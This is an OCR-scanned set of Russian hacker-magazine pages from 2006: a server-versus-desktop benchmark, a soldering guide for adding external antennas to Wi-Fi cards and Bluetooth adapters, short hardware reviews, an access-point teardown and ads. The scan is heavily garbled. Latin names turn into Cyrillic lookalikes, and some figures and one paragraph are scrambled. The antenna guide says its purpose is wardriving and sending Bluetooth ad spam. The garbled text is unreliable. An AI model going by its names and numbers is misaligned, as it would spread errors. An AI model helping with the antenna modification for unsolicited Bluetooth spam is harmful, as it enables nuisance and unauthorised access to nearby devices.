шиной памяти. Объем памяти — 16 Мб. 

ОВбой! 

Долго думав, чем бы занять наши «машинки», 
мы составили наиболее адекватный, на наш 
взгляд, набор тестов. ЗО-задачи исключить 
пришлось сразу. Если десктопная система 



с легкостью пережевывала любой скормлен- 
ный бенчмарк, а в играх была способна вы- 
дать сотню РРЗ, то сервер не осиливал даже 
ЗОМагк 2001 (не удивительно — возможности 
30 находятся на уровне видюх прошлого 
века). В общем, решено было сделать упор на 
софт, чувствительный к связке «процессор 
— память» и дисковой подсистеме. 

В список вошли следующие проги: архивато- 
ры ѴѴіпЯАР и 7-2 ір (многопоточный и однопо- 
точный режимы), МРЗ-кодек ГАМЕ (ѴВР, 697 
секунд), ОіѵХ (300 секунд), ЗирегРІ. Кроме 
того, делался общий тест системы комплек- 
сом РаззМагкРегГэгтапсеТезіб.О (РСМагк 
не подходил по причине требовательности 
к видеоподсистеме), а также запуска- 
лись бенчмарк памяти РідНіМагк Метогу 
Апаіугег и профессиональный тест дисков 
Н2ВЕЫСНѴѴ. 

О Результаты 

Итак, в процессорных тестах (архивация, 
ЗирегРІ, кодирование аудио/видео) серверу 
не повезло — даже имея на борту 4 процес- 
сорных ядра, он не смог опередить куда более 
дешевую домашнюю систему. А причинато 
совсем близко! Просто-напросто не настал 
еще тот момент, когда количество станет 
ценнее качества — 2 ядра с высокой частотой 
практически в любой распространенной 
софтине покажут более высокий результат, 
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чѳм 4 с гораздо меньшей. Что касается 
памяти, то РМАА показал довольно интерес- 
ную картину. С одной стороны, «синтетика», 
вроде скорости записи/чтения, у систем едва 
отличается, с другой — заметна большая 
разница в реальной пропускной способности 
в пользу сервера! 

РаззМагк РеііогтапсеТезі 6.0 оказался еще 
более интересным. Видимо, этот комплекс 
все-таки распознал все то четырехъядерное 
богатство, которое было отдано ему в рас- 
поряжение, и заюзал его по полной! Однако 
РаззМагк РеііогтапсеТезі 6.0 состоит из це- 
лого набора тестов. Все процессорные тесты 
показали явное превосходство сервера. А вот 
результаты видеотестов оказались слабыми, 
из-за чего десктоп снова победил. 

Что до дисковой подсистемы, то в обоих слу- 
чаях мы проводили тесты на первом (систем- 
ном) разделе. Результаты вновь противоре- 
чивы: в зависимости от операций разница то 
в пользу сервера, то в пользу десктопа. Отрыв 
при этом довольно значительный, так что ни 
о какой погрешности в измерениях говорить 
мы не можем. Более подробно ситуация пред- 
ставлена на графиках. 

О Итог 

Закончив тест, мы пришли к очевидному 
выводу: в обыкновенных, повседневных 
задачах пользы от преимуществ сервера 



довольно мало. По крайней мере, до тех пор, 
пока софт не обучился использовать боль- 
шее количество ядер (сейчас используется 
максимум 2). Отсюда же мы можем заклю- 
чить, что в домашнем компе 4 процессорных 
ядра совсем ни к чему и вряд ли в ближай- 
шее время такое их количество пригодится. 
Тем не менее, на стороне сервера играет 
быстрая дисковая система, качественная 
сеть и не в пример высокая стабильность. 
Баланс, как видишь, соблюден, таким его 
и стоит оставить. ПС 



Кодирование и ЗирегРІ 
(чем меньше, тем лучше) 




ОіѵХ(с) БАМЕ (с) 


ЗирегРІ (с) 


Сервер 

Десктоп 


35 22 

19 12 


31,641 

17,703 


Архиваторы многопоточный/однопоточный 
режим (больше — лучше) 




ѴѴіпРАР (Кбит/с) 


7-2ір (МІРЗ) 


Сервер 

Десктоп 


805/432 

1216/719 


2341/1601 

2880/4012 


РаззМагк РеіЧогтапсеТезіб.О 
(больше — лучше) 


Сервер 

Дескотоп 




765,4 

1213 



РГіОІОЗІІОр 





Кбайт/сек 



>Тестирование дисковой подсистемы на 
примере профилей различныхпрограмм 
или операций 




>Тест пропускной способности памяти 
закончился не в пользу десктопа 



Н2ЬепсНѵѵ - время поиска 



0 НереИіѵезериепІіаІ геасі 

1 Зериепііаі ІгапзТег геасі ѵѵ/геасІ-аИеас) 
I Зериепііаі геасі гасіетесііит 




Кбайт/сек 



> Скорость работы дискового интерфейса 



іезПаЬ выражает благодарность за предоставленное на тестирование оборудование компаниям Ф-Центр 
(т.( 495) 1 05-6447, ѵѵѵѵѵѵТсепІег.ги ) и Хсот (т.( 495) 799-9600, ѵѵѵѵѵѵ.хсопп.ги Т 
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НА ПРАВАХ РЕКЛАМЫ 





Живым Ій здоровым. 



Особые примет выгляди? ярко и вшывще 
іа фоне повадшоад, шт к невдшзделау псйдшв, 
шшо набирает иадндоватыса и вдагошдшаді 
тчі, где лояшш» 



Не за награду, а во имя добра. 



ЧРЕЗМЕРНОЕ УПОТРЕБЛЕНИЕ ПИВА 

ОРОВЬЮ 





:ергей долин| 



^ ^еггит 



«ЗЕМЛЯ» - ПОДПАЯТЬ ОПЛЕТКУ КАБЕЛЯ 









О * 



Ѣ Ь « й й * т 

КОНДЕНСАТОР, ПОВЕРНУТЫЙ НА90 



СЮДА ПОДПАИВАЕТСЯ ЦЕНТРАЛЬНАЯ ЖИЛА КАБЕЛЯ 



ПОДПАИВАЕМ ВНЕШНЮЮ АНТЕННУ 



К НАМ НА ПОЧТУ ПРИХОДИТ ОЧЕНЬ МНОГО ВОПРОСОВ О ТОМ, КАК МОЖНО ПОДПАЯТЬ ВНЕШНЮЮ АНТЕННУ К ѴѴІ-РІ КАРТЕ 
И АДАПТЕРУ ВШЕТООТН. ЛЮДЕЙ МОЖНО ПОНЯТЬ: КТО-ТО ХОЧЕТ ОРГАНИЗОВАТЬ РАССЫЛКУ РЕКЛАМЫ ПО ВШЕТООТН, 
КОМУ-ТО ПРИ ВАРДРАЙВИНГЕ НЕ ХВАТАЕТ МОЩИ СТАНДАРТНОЙ АНТЕННКИ. ЧТО ЖЕ, СПРАШИВАЛ И - ОТВЕЧАЕМ. 



РСМСІ-карта 

1 . Вскрываем пациента 

Возьми карточку в руки и осмотри еѳ. Почти у 
всех карт визуально выделяется утолщенная 
пластиковая часть корпуса, под которой и 
находится антенна. Однако не всегда есть 
возможность культурно открыть этот плас- 
тиковый отсек. В моем случае, например, 
это не получилось. Тут есть два пути. Первый 
— аккуратно прорезать по кругу пластик, 
чтобы можно было снять пластиковый кожух. 
Второй — разобрать металлическую часть 
корпуса, разогнув завольцованные стенки 
девайса и подцепив один из краев тонким 
ножем. Я выбрал второй путь и, наверное, 
прогадал: раздраконить корпус мне в итоге, 
конечно, удалось, но он после этого пришел 
в полную негодность :). Так что тебе советую 
вооружиться дедушкиным ножовочным по- 
лотном и просто отрезать пластиковую часть 
корпуса. 

2. Перепайка конденсаторов 

Если посмотреть в район антенного блока 
на карте, можно легко увидеть внутреннюю 
антенну: она выполнена как две буквы «О»: 



петлей. Рядом бросаются в глаза две неза- 
паянные контактные площадки, созданные 
специально для того, чтобы подпаять к 
ним внешнюю антенну. Но тут есть нюанс: 
плата изначально собрана для работы без 
внешней антенны, и если ты внимательно 
посмотришь, то заметишь, что от высоко- 
частотного модуля через конденсаторы 
(миниатюрные «кирпичики» на плате) идут 
дорожки к внутренним антеннам, а наши 
контактные площадки как будто висят в 
воздухе. Для решения этой проблемуы надо 
перепаять конденсаторы: просто повернуть 
их на 90 градусов, чтобы сигнал через них 
шел к контактным площадкам, куда мы при- 
паяем внешнюю антенну. 

3. Подпаиваем разъем 

После небольшой операции с конденсатора- 
ми нужно припаять разъем для подключения 
новой антенны. На большой фотографии 
рядом отмечены места, куда нужно припаи- 
вать провод. Там три контакта. Два внешних 
— земля, которая является оплеткой кабеля, 
и центральная жила волновода. 

Под руками у меня не было нового разъема, 



поэтому я решил просто оторвать провод с 
коннектором от разобранной в «Іпзісіе» точки 
доступа :). В итоге получилось неплохо. 

4. Дырка для провода 

Предпоследний шаг: нужно сделать отвер- 
стие в снятой пластиковой части корпуса, 
чтобы можно было вывести наружу провод 
с разъемом для подключения антенны. 
Проще всего это сделать при помощи дре- 
ли, либо тонкого круглого натфиля. 

5. Закрываем карточку 

На этом шаге у меня возникли серьезные 
проблемы :). Измятые края металличес- 
кого корпуса никак не хотели завольцо- 
вываться обратно: металл вытянулся, 
изогнулся, и вернуть его первоначальное 
состояние было очень проблематично. 
Поэтому я, честно говоря, забил на это: 
мы стали юзать карту без всякого 
корпуса :). Тебе, еще раз повторю, сове- 
тую не вскрывать металлическую часть 
корпуса, а отпилить пластиковую, 
которую потом ты просто приклеишь на 
место. 
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"Я дизайнер спортивны ?сМопюимклов 
щ ‘Италии и ршю, что победа & гонке госта 
Зависит от скорости реакции. ‘ЛоэтоМу 
в технике для Мет главное — безупрегное 
качество и способность Мгновенно 
реагировать на каждое движение . 



ул. Донская, 32, тел.: (495) 967-1555 
ул. Малышева, 20, тел.: (495) 105-0700 
ул. Трифоновская, 45, тел.: (495) 967-1433 
Единая справочная: (495) 221-1111 



Во Власти Качества 

Совершенство движущегося изображения 

1С0 монитор М 1740 А 

Время отклнка 12 ме - Ярмегі» 4№д»'м2 - Встроенный ТВ- іюм ер ■ Динамики 2кЗ « 



Иж|>орнационнаи служба Ій Еіесіг-отга В-Э0О-2О4Э-7&-76 
\ Й4ы': -ппа шине трнчйи линия № РѴмМ'ии) 
тдѵ.Ід.ги 



оод 



НИЗКИЕ ЦЕНЫ КАЖДЫЙ ДЕНЬ 
шт. оіеіі.ги 



рі'к.пп ы л Торлр е.0ціифици[іри;,ін 






^ Геггит 



РЯМСЕИ 



> Для новичков, ни разу 
не державших в руках 
паяльник, или людей, 
предпочитающих оте- 
чественные «топоры», 
будет очень сложно 
перепаять девайсы. 
Нужна паяльная станция 
и хороший флюс :). 
Примечание Никитоса: 
первоклассные услуги 
по перепайке любых 
устройств на безвозмез- 
дной основе предостав- 
ляет Длинный; пиши ему 
в любое время! 



«Ь 

> На РѴР лежит видео- 
ролик, иллюстрирую- 
щий процесс перепайки 
РСМСІ-устройства и 
ЫиеІооІИ-адаптера. 




> На нашем диске лежит 
несколько институтских 
учебников в РРР по 
высокочастотной связи. 
Если интересно почи- 
тать математику этого 
дела — вперед :). 



ЕМ?И 

> Опытные ѴѴІ-РІ из- 
вращенцы, подключая 
мощные анетенны собс- 
твенного изготовления, 
добиваются установле- 
ния связи на расстоянии 
до 35 километров. 




ВЫСОКОЧАСТОТНЫЕ 

РАЗЪЕМЫ 



ВООБЩЕ ГОВОРЯ, СУЩЕСТВУЕТ НЕСКОЛЬКО СТАНДАРТОВ ВЫСОКОЧАСТОТНОГО 



ОБОРУДОВАНИЯ. ЧТОБЫ ТЫ НЕ ЗАПУТАЛСЯ, МЫ РЕШИЛИ ПРИВЕСТИ ТЕБЕ НАЗВАНИЯ 



И ФОТОГРАФИИ ВСЕХ СТАНДАРТНЫХ РАЗЪЕМОВ 





ПОДПАЯННАЯ АНТЕННА 



Мощный ЫиеІооІН 

С синим зубом все гораздо проще. Мы пошли в 
ближайший магазин и за 600 рублей купили адаптер 
ВІиеіооіН 2.0. Через 30 минут мы уже тестили девайс 
со здоровой антенной, без проблем перекачивая 
файлы на расстоянии 100 метров. Единственная воз- 
можная тут проблема — вскрыть устройство. Но для 
таких крутых хакеров, как мы с тобой, это не задача. 

1 . Вскрытие- корпуса 

Главное — сразу понять, как он вскрывается :). 
Универсальных рецептов давать не буду в силу 
существования множества модификаций корпусов. 
Внимательно изучив структуру заглушек, ты быстро 
найдешь способ вскрыть девайс при помощи обычно- 
го кухонного ножа. Кроме того, всегда есть запасной 
хакерский вариант: просто разломать его на части. 



2. Подпайка антенны 

Внимательно осмотри плату на предмет наличия антенны. 
Как и в ѴѴі-Рі карточке, антенна должна быть выполнена в 
виде дорожки нестандартной формы на печатной плате. 

В моем случае это была окружность с точкой внутри. Де- 
лаем в корпусе отверстие под провод и подпаиваем цент- 
ральную жилу кабеля к точке, а оплетку — к окружности. 
Чтобы было понятнее, посмотри на фотографию :). 

3. Сворка и тест 

После того как провод подпаян, нужно поместить плату на 
место. Вполне вероятно, что собрать все как было у тебя 
не получится. Поэтому есть простой совет — приклей 
отвалившиеся части или залей термоклеем. Что касается 
тестирования, мы просто подключили одну их наших 
антенн и провели разведку боем, которая показала 
качественное повышение уровня сигнала. ЗС 
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БОЛЬШЕ 
ВРЕМЕНИ ДЛЯ 
МАСШТАБНЫХ 

Благодаря высочайшей производительности 
двухъядерных процессоров Іпіеі® Соге™ 2 Оио 
и традиционному качеству Р-Зіуіе рабочие 
станции Р-Зіуіе® СагЬоп® Аі 830 ѴѴР позволяют 
существенно увеличить эффективность работы: 





! 

і 

і 

I 

I 




Минимизировать рутинные операции 
Увеличить производительность труда 
Решать масштабные задачи 



Р-51уІе Сотриіегз рекомендует 
ѴѴіпсІоѵѵз® ХР РгоТеззіопаІ. 



к-ьіуіе иагооп аі ѵѵк 



Система качества проектирования, разработки 
и производства компании Р-51уІе Сотриіегз 
сертифицирована по международному стандарту 
150 9001 - 2000 . 



Сделано в России. Сделано на совесть! 



Оптовые поставки: 

ООО «Эр-Эс-Ай»: тел.: (495) 514-1419 

ѵѵѵѵѵѵ.гзі.ги 

Техническая поддержка: 

ЗАО «Эр-Стайл Компьютере»: тел.: (495) 514-1417 
8-800-200-800-7 * 

ѵѵѵѵѵѵ.г-зіуіе-сотриіегз.ги 




К- 8іу1е 

М Р У Т Е К 3 



Астрахань ТАН (8512) 24-57-43 Братск БАЙТ (3953) 41-11-21 Брянск П-Зіуіе (4832) 41-17-40 Владивосток П-ЗТуІе (4232) 45-94-82 Екатеринбург П-ЗТуІе (3432)-616086 Иваново Компьютерные 
системы (4932) 23-76-26 Калининград Балтик Стайл (4112) 99-11-99 Кемерово Конкорд Про (3842) 35-75-91 Киров ИТЦ Компьютер-Сервис (8332) 35-74-24 Костомукша Вымпел (814 59) 780-21 
Кострома ИТ-Профессионал (4942) 626-903 Краснодар Бизнес Компьютер Центр - Юг (8612) 64-04-50 Красноярск ЛанСервис (3912) 75-12-91 Москва П-ЗТуІе Тгасііпё (495) 514-1414 БЕЛМОНТ 
КОНСАЛТАНТС (495) 937-1606 Компания П-ЗТуІе (495) 514-1410 Компьютерплаза (495) 772-7600 Микро-Тех (495) 786-77-37 Нижний Новгород П-5іуІе (8312) 18-24-86 Р-ЗТуІе (3832) 66-11-67 
П-51у1е (3422) 16-43-76 Петрозаводск Илвес (8142) 74-37-37 Петропавловск-Камчатский АМН (4152) 26-87-51 Ростов-на-Дону Р-Зіуіе (863) 252-48-13 Санкт-Петербург Р-5іуІе (812) 445-34-29 
Тула ПитерСофт - НТ (4872) 35-55-00 Тюмень Р-Зіуіе (3452) 74-74-74 Уфа Альбея Техпроект (3472) 77-69-55 Уфа Онлайн (3472) 248-228 Хабаровск Р-Зіуіе (4212) 31-45-30 Челябинск Компьютеры 
и образование (351) 265-69-08 Инженерный центр (351) 232-52-62 Якутск Эльф-95 (4112) 45-73-33 



* бесплатный телефон для регионов России 






свежак 




ВіІІіоп Вірас 6600 



Широкополосный роутер сусиленными функциями безопасности 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Интерфейсы: ІхѴѴАЫ (РУ-45) 10/100 Мбит/сек, 4хІ_АЫ (РУ-45) 10/100 
Мбит/сек 

Функции роутер ЫАТ/ЫАРТ, ЭМ 2, ОупОЫЗ, Зіаііс Яоиііпд 
Функции файрвола: ЗРІ, Мае Ріііег, Раскеі Ріііег, Сопіепі Ріііег 
Дополнительно ѴРЫ Разз-ТНгоидН 




1 . Внешне этот девайс выделяется своими сверхмалыми габаритами 
и футуристическим дизайном корпуса. 

2. Пропускная способность ѴѴАЫ-интерфейса в каждом направлении 
составляет 57,24 Мбит/сек, в полном дуплексе — 61 ,79 Мбит/сек. 

3. В настройках ѴѴАЫ-интерфейса доступны 3 режима работы: Зіаііс 
ІР, Оупатіс ІР (ЭНСР) и РРРоЕ. Возможность работы с РРТР-соедине- 
ниями отсутствует напрочь. 

4 . Конфигурировать роутер можно как посредством ѵѵеЬ-интерфей- 
са, так и через командную строку іеіпеі. 

5 . Управление через Іеіпеіоченьспецифично.требуетзнаний нестан- 
дартных команд, поэтому оно вряд ли придется кому-то по душе. 

6. Расположение настроек в ѵѵеЬ-интерфейсе достаточно логичное. 
Также присутствует мастер быстрой настройки. 




1 . Настройки файрвола не позволяют создавать гибких правил филь- 
трации трафика. Все, что можно задать, — это протокол фильтрации, 
а также диапазоны ІР-адресов и портов локальных компьютеров, для 
которых применяется правило. 

2. Сканирование на уязвимости в ТепаЫе Ыеззиз не выявило серьез- 
ных дырок в безопасности роутера. Однако со стороны ѴѴАЫ-интер- 
фейса остается доступным порт ОИЗ-сервера. 



Окііск 5808 



Клава для любителей металла 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Подключение ЕІЗВ 
Материал корпуса: алюминий 

ОеоБенности:5Ііт-дизайн, регулируется высота подъема 




1 . Эта клавиатура сразу бросается в глаза благодаря своему дизайну 
и расцветке. 

2. Она плоская (модный зііт-дизайн); все углы корпуса закруглены, а 
его серебряный цвет придает устройству дополнительный шарм. 

3. Такой облик позволяет разместить эту клавиатуру на столе рядом 
с другими устройствами хай-тековой внешности — выделяться на их 
фоне она не будет. Или можно установить ее на почти пустом столе, 
чтобы она делила его пространство со сверхтонким ЖК-дисплеем. 

4 . Несмотря на небольшие размеры девайса, все необходимые клави- 
ши на нем присутствуют. 

5 . Корпус устройства сделан из алюминия, а не из пластика, так что 
можешь его ронять. Но не сильно. 

6. Высота подъема регулируется. В отличие от подавляющего боль- 
шинства подобных устройств, в этой клавиатуре ножки имеют не 2 по- 
ложения (либо подняты, либо сложены), а много — можешь выбирать 
именно то, которое будет удобно твоим пальцам. 

В 

1 . Если ты работал с ноутбуками, то раскладка основной клавиатуры 
будет тебе хорошо знакома. А если нет, то придется привыкать. 

2. Клавиши мягко и коротко нажимаются, но расположены очень близ- 
ко друг к другу, из-за чего можно промахнуться и задеть соседние. 
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МісгоІаЬ РС360 



Колонки необычной расцветки 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Тип системы 2.1 + 1 
Мощность КМ 5, Вт: 47 
Соотношение сигнал/шум, дБ: 65 

Материал корпусе: сабвуфер — дерево, сателлиты — пластик 
Размер динамиков (саззуфер, сателлиты), дм: 5,25 
Размеры саввуфера, мм: 248x222x228, 

Размеры сателлитов, мм: 96x90x1 20 
Размеры усилителя, мм: 201x72x212 
Вес системы, кг: 7 



1 . Если ты догадываешься, что система 2.1 — это 2 сателлита и низко- 
частотный блок, то тебя наверняка удивляет приставка «+1 «.Удивля- 
ет? Так знай: за этим обозначением скрывается усилитель. 

2. Звук вся система выдает довольно качественный и насыщенный. 
Немалую роль в этом играют как раз сабвуфер и усилитель. 

3. Помимо своей основной роли, усилитель служит местом сосредо- 
точения органовуправления всей системы и портов, необходимыхдля 
подключения. 

4 . Подключение возможно не только к компьютеру, но и, например, к 
ОѴО-плееру. Все — благодаря нескольким разъемам ЯСА. 

5 . Габариты компонентов системы избавят от проблем с ее разме- 
щением. Небольшие сателлиты и усилитель поместятся на столе, а 
более массивный, как ему и положено по званию, сабвуфер встанет 
на пол. 

6. В комплект поставки входят все необходимые кабели и русскоязыч- 
ное руководство пользователя. 



1 . Такой вариант цветового оформления предназначен для людей с 
очень тонким и специфическим чувством прекрасного. А кто еще пос- 
тавит дома колонки, корпус которых черного цвета, а передний экран 
— малинового? 



СМС ІіоЫеззе АѴС-М1 



Корпус с пультом ДУ 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
Форм-фактор: МісгоАТХ 
Слоты: 1x5,25 ехі, 2x3,5 іпі 
Порты: 2x113В, РігеѴѴіге, тіс, аисііо 
Дополнительно: 2 вентилятора 80 мм 
Размеры, м 1 36x360x356 
Вес, кг 6,7 



1 . Пусть компьютерные маньяки, которые жить не могут без своего 
железа, ставят себе гигантские корпусы, засовывают в них мощные 
видеоплаты, горящие процессоры и массивные системы охлаждения 
всего этого барахла! «Мы за изящество и дизайн», — говорят те, кто 
остановил выбор на корпусе ОМС ІЧоЫеззе АѴС-М 1 ! 

2 . Форм-фактор изделия — МісгоАТХ, поэтому много места он не зай- 
мет, но и внутрь поместится только самое необходимое. 

3. Зато все, что нужно для создания домашнего мультимедиа-центра, 
у него есть. 

4 . Корпус компактен, имеет стильный внешний вид, дополнительные 
клавиши управления и информативный экран на передней панели. 

5 . Также есть инфракрасный порт и пульт дистанционного управле- 
ния из комплекта поставки, для которого имеются батарейки. 

6. Установлены 2 дополнительных вентилятора (каждый размером 
80 мм). Один расположен на передней панели, другой — на задней. 

7. Несущественная, но очень удобная деталь — крышка корпуса дер- 
жится на винтах-барашках, так что отвертки не понадобится. 



1 . Внутри корпусадовольно просторно, но это потому что там пока ни- 
чего нет, только корзины для накопителей да провода для соединения 
устройств передней панели и системной платы. 



* 
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іезі_ІаЬ выражает благодарность за предоставленное натестирование оборудование компании МЕРНОЙ (т.(495) 739-0959, ѵѵѵѵѵѵ.тегііоп.ги ). 
ИеѵасІа(т.(495) 101-2819, ѵѵѵѵѵѵ.пеѵасІа.пЛ а также российскому представительству компании ВіІІіоп. 



ХАКЕР 12/96/ 06 



/033 






^ іпгігіе 



Ш Ш ФЕДОР ПОНАРОВСКИЙ 

«БЕСПРОВОДНАЯ 

^АНАТОМИЯ 

РАЗЛАМЫВАЕМ НА ЧАСТИ ѴѴІ-РІ ОБОРУДОВАНИЕ 



Что мы вскрыли 

отве Ртк Л и, нСи струбцин НВШИ ПЛОСКогуб ЧЧ 
об °РУДо в ание.Влабоп ЗЯЛИСЬЗаИ/ №- 

одну точку доступа. Если г 8 ' Карт04 ^ 
Нее ’ 10 мь/ раздраконил ° В ° рить к °нкрет- 
°^-2000АР + , Р С мсГ? ЧаСТИАР °-^пк 
а также хитрую карту ф и 1 '' КаРТуг У ХЕ ^-162, 
п Роиз в0 д Илась на У^ Ирмы Ази8 ' которая 



ВО ВСЕМ МИРЕ ПРЯМО СЕЙЧАС ДЕСЯТКИ МИЛЛИОНОВ ЛЮДЕЙ ИСПОЛЬЗУЮТ ѴѴІ-РІ. В НЬЮ- 
ЙОРКЕ БАНКИР ДЖОРДЖ С НОУТБУКА ПРОВЕРЯЕТ КОРПОРАТИВНУЮ ПОЧТУ, В СИНГАПУРЕ 
СТУДЕНТ ПСИ ЙОН ДЖИ СДАЕТ ЭКЗАМЕН ПРИ ПОМОЩИ КПК И ЗАКАЧАННОЙ В ИНТЕРНЕТ 
ШПАРГАЛКИ. А В МОСКВЕ В ТЕПЛОЙ ПИЦЦЕРИИ КАРДЕР ТИМОФЕЙ СЧИТАЕТ ДЕНЬГИ БАНКИ- 
РА ДЖОРДЖА, ПОДРУБАЯСЬ НАХАЛЯВУ К ИНЕТУ ЧЕРЕЗ ЯНДЕКС.ѴѴІ-РІ. ВСЕ ЭТИ ЛЮДИ ОЧЕНЬ 
ДОВОЛЬНЫ ЖИЗНЬЮ И РАДЫ ПРЕКРАСНОЙ ТЕХНОЛОГИИ. НО ИМ АБСОСЛЮТНО ВСЕ .РАВНОЙ 
КАК ЭТО РАБОТАЕТ. А НАМ С ТОБОЙ - НЕТ. 



1 . РАЗЪЕМ ВНЕШНЕЙ 
АНТЕННЫ 



6. ТРАНСФОРМАТОР 
ЕТНЕВЫЕТ -АДАПТЕРА 






2. ВНУТРЕННЯЯ АНТЕННА 

Дублирует внешнюю 




3. ПРОЦЕССОР 

Центральный мозг девайса 



4. БЛОК ПИТАНИЯ 

Понижает напряжение 
до 3 вольт 



5. РАЗЪЕМ ЕТНЕКЫЕТ 

Служит для подключения к 
локальной сети 
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а доступа = полноценный комп I 

Сразу после того, как я вывернул последний винт 
из корпуса точки доступа и снял верхнюю крышку, } А 
Я проникся глубоким уважением к разработчикам ' 
этого девайса. В скромной серой коробочке пря- 

талоя полноценный компьютер с процессором 
оперативной памятью, флешевым винтом, шиной 
тіп,РСІ и 1 00 тЬрз ЙНегпеі-контроллером. 

Не стоит удивляться, приятель, все очень логично 
При производстве любого железа перед инже- 
нерами стоит цель сделать девайс как можно 
Дешевле, а архитектуру устройства- простой и 
расширяемой, чтобы можно было легко добавлять 
различную функциональность, ремонтировать 
и обслуживать. В этом случае, совершенно 
понятно — куда разумнее использовать набор уже 
готовых микросхем и стандартов, чем изобретать 
велосипед. 

Именно по этой причине большая часть всего 
«умного» сетевого оборудования - не что иное 
как компактные компьютеры, обычно собранные 
на базе процессоров АРМ и работающие под 
управлением І_іпих. 



> Внутренний блок 
питания в\точке 
доступа 



> МІМІРСІ карточка, при помощи которой 
АР организует беспроводную инфраструктуру 



Ж* * 

Флешка, память и БП 

На системной плате точки смонтированы две 
микросхемы. Первая (МХ29БѴ800ВТС-90) пред- 
ставляет собой флешку объемом 2 Мб , к которой 
примаунчена файловая систематочки доступа. 

Там, соответственно, хранится ядро операционки, 
все системные приложения и настройки. Вторая 
микросхема К43641 632Н — это 64 Мб оператив- 
ной памяти: туда загружается ядро, все работаю- 
щие демоны, приложения и т.д. 

Память питается от напряжения 3,3 В, в то время 
как внешний адаптер преобразует переменные 
220 в постоянные 5 вольт. Чтобы решить эту 
проблему, на плате смонтирован импульсный БП, 
который выделяется на плате имеющими харак- 
терный вид конденсаторами, катушкой индуктив- 
ности и транзисторами. Блок питания представля- 
ет собой стандартную чопперную схему, которая 
работет очкень просто. Она состоит из одного Р- 
канапьного ключевого МОП-транзистора, управ- 
ляемого микроконтроллером через согласовыва- 
ющий каскад на биполярном ЫРЫ-транзисторе. 
Ключевой транзистор подключен к индуктивности, 
диоду и конденсатору. Если серьезно, то работа 
импульсных блоков питания - это тема, достояная 
отдельной статьи. И ты обязательно ее увидишь 
скоро в нашем журнале. 



Софтовая часть 

Любое сложное сетевое устройство 
должно предоставлять пользовате- 
лям удобный способ для удаленного 
управления. В нашем случае точка 0-Ипк 
С>ѴѴ1_-2000АРч- поддерживает конфигури- 
рование при помощи ЗММР (специально- 
го протокола Для управления сетевыми 
устройствами), а также жеЬ-интерфейса 

Рискну предположить, что по ЗЫМР никто 
из домашних пользователей не будет 
извращаться :). 

На точке под линуксом поднят целый на- 
бор сетевых сервисов: ЬПрф энср, пай 
кеширующий йМЗ и т.д. В общем, все 
что нужно для работы: № еЬ-сервис при 
помощи конфигурационных приложений 
позволяет настраивать точку доступа, 
° НСР выдает клиентам ір-адреса, пай 

осуществляет трансляцию сетевых ад- 
ресов и т.д. _ все, как в случае обычного 
ипіх-сервѳра. 
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> На РѴР лежит видео, 
иллюстрирующее 
процесс вскрытия ѴѴІ-РІ 
оборудования. Спеши 
заменить. 



/036 



5. КОНТАКТНЫЕ ПЛОЩАДКИ 

Сюда можно подпаять внешнюю 
антенну 



Клиентское оборудование 

Если рассматривать любую ѴѴі-Рі кар- 
точку, то на ней легко можно выделить 
две логические части: высокочас- 
тотную (набор микросхем, преобра- 
зовывающих логические сигналы с 
процессора карточки в радиосигнал) 
и, собственно, процессор с сопутс- 
твующими чипами (они поддерживают 
работу шины РСМСІ и организуют 
передачу данных между шиной и высо- 
кочастотным блоком). 

Внутренняя антенна обычно представ- 
ляет собой дорожку на печтаной плате 
специальной формы, которую обычно 
визуально легко обнаружить. 



2. ВЫСОКОЧАСТОТНЫЕ 
МИКРОСХЕМЫ 

Служат для преобразования 
цифрового сигнала в радио и 
наоборот 



4. ВНУТРЕННЯЯ АНТЕННА 

Выполнена в виде печатных 
проводников 



3. МИКРОСХЕМЫ БЕСПРО- 
ВОДНОГО ИНТЕРФЕЙСА 

Служат для согласования шины 
с высокочастотным модулем 



РАЗОБЛАЧЕНИЕ АБЫЗ 

В тестлабе нам попалась интересная 
ѴѴі-Рі карточка Азиз, которая была 
выполнена на базе «фирменной шины 
ѴѴігеІезз». Было чертовски интересно, 
что же у нее там внутри. Вооружив- 
шись плоскогубцами, мы вскрыли 
красавицу и обнаружили. . . обычную 
МІКІІРСІ карточку, смонтированную 
прямо на плате :).Тоесть от хитроум- 
ных ножек «новой шины» разводка 
прямиком шла на контакты обычной 
МІКІІРСІ карты, которую Азиз, должно 
быть, устанавливала в то время в свои 
ноуты. 
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1 . ИНТЕРФЕЙС РСМСІ 

Для подключения к ноуту 









ОС: ѴѴіпбоѵѵз Ѵізіа 

Производитель: МісгозоЙ 
Дата выхода: 30 ноября 2006 года 
Лицензия: коммерческая 

Минимальные системные требования (Ѵі$1а СараЫе): 

800 МГцСРІІ; 512 Мб РАМ; видеоадаптер 32 Мб, совместимый с 
ОігесіХ 9; 1 5 Гб свободного места 

Рекомендуемые системные требования (Ѵі$1а Ргешіиш 
Пеасіу): 1 ГГцСРІІ;1 Гб РАМ; видеоадаптер 128 Мб, совместимый 
с ОігесіХ 9 и поддержкой технологий Нагбѵѵаге РіхеІ ЗИабег ѵ2.0 и 
Ѵ\ЛІЮМ; 1 5 Гб свободного места 



ОС: МапсІ гіѵа І_іпих 2007 

Произв одитель: Мапбгіѵа 
Дата выхода: 4 октября 2006 года 
Лицензия: ОРІ_ (ЕІІІ_А для версии РоѵѵегРаск) 
Минимальные системные требования: 

Іпіеі РеЫіит/Хеоп или АІѴЮ СРІІ, 256 Мб РАМ, 

700 Мб НОВ для минимальной установки 

Рекомендуемые системные требования: 

ІпіеІ Репііит/Хеоп или АІѴЮ СРІ), 512 Мб РАМ, 

3 Гб РЮО, 128 Мб видео 



ѴѴІІѴЮ0ѴѴ5ѴІ5ТА: 



Решившись было почитать, что пишут о 
новой системе пользователи, я быстро 
оставил эту идею. Чего только не расска- 
зывают о новой разработке МісгозоЙ: у 
кого-то она запускается даже на самом 
скромном компьютере; другие, видимо, 
тестируя сырую бету, утверждают, что 
система тормозит даже на навороченном 
компе с процессором ІпіеІ Репііит О 2,8 ГГ ц 
и гигом оперативки. Но вот что я тебе скажу: 
ерунда это все! Во-первых, все зависит 
от того, что именно ты хочешь получить 



от ѴѴіпбоѵѵз Ѵізіа. Недаром системные 
требования разделили на Ѵізіа СараЫе и 
Ѵізіа Ргетіит Реабу. Если тебя интересуют 
самые современные графические навороты 
